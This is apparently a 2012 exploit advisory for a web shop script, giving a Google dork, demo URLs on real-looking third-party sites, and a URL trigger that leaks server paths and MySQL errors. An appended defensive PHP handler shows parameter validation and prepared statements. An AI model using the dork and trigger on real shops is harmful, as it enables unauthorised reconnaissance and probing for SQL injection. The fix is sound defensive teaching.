MaztoR

FPD IGT SQL ERROR

May 22nd, 2012
# Exploit Title: Full path disclosure and SQL Error ONLINE SHOP IGT
# Date: 24/02/2012
# Author: MaztoR
# Vendor or Software Link: http://www.igt.com.hk
# Version: ALL
# Category: webapps Shop
# Google dork: inurl:company_index.php
# Tested on: Linux

-----------------
DEMO
-----------------
http://colate20101022.tradinghand.com/company_index.php?id=1602&file=home&prod=prod&uid=
http://www.tiendaguasu.com/company_index.php?id=&file=home&prod=&uid=
http://www.szdigo.supplier-buy.com/company_index.php?id=2656&file=home&prod=sell&uid=
----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]

----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
Greetz: HielaSangre - Linuxfer - SunPlace - xDarkStonex - SeguridadBlanca - rbot
ALL USERS #RE - DDLR
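
A defensive counterpart to the two results above, added here and not part of the original paste or the vendor's code: a PHP handler that validates `id` and `uid` as integers, binds them in a prepared statement, and keeps PHP warnings and MySQL errors out of the response. The DSN, credentials, and the `company` table with its `name` and `owner_uid` columns are assumptions; only the parameter names come from the advisory.

```php
<?php
// Added example, not the vendor's code. The DSN, credentials and the
// table/column names are assumptions; only the parameter names are from the page.
declare(strict_types=1);

// 1. Keep PHP warnings out of responses (they leaked the filesystem path); log them.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/** Positive integer from the query string, or null if absent, empty or non-numeric. */
function int_param(string $name): ?int
{
    $v = filter_input(INPUT_GET, $name, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return ($v === null || $v === false) ? null : $v;
}

$id  = int_param('id');
$uid = int_param('uid'); // an empty "uid=" becomes null instead of broken SQL
if ($id === null) {
    http_response_code(400);
    exit('Bad request');
}
try {
    $pdo = new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', 'shop_ro', 'CHANGE_ME', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
    // 2. Bound parameters: request values never become part of the SQL text.
    $sql  = 'SELECT name FROM company WHERE id = :id';
    $args = [':id' => $id];
    if ($uid !== null) { // optional filter, added only for a valid uid
        $sql .= ' AND owner_uid = :uid';
        $args[':uid'] = $uid;
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($args);
    $company = $stmt->fetch(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    // 3. Details go to the server log; the client gets a generic message.
    error_log('company_index: ' . $e->getMessage());
    http_response_code(500);
    exit('Internal error');
}
if ($company === false) {
    http_response_code(404);
    exit('Not found');
}
echo htmlspecialchars($company['name'], ENT_QUOTES, 'UTF-8');
```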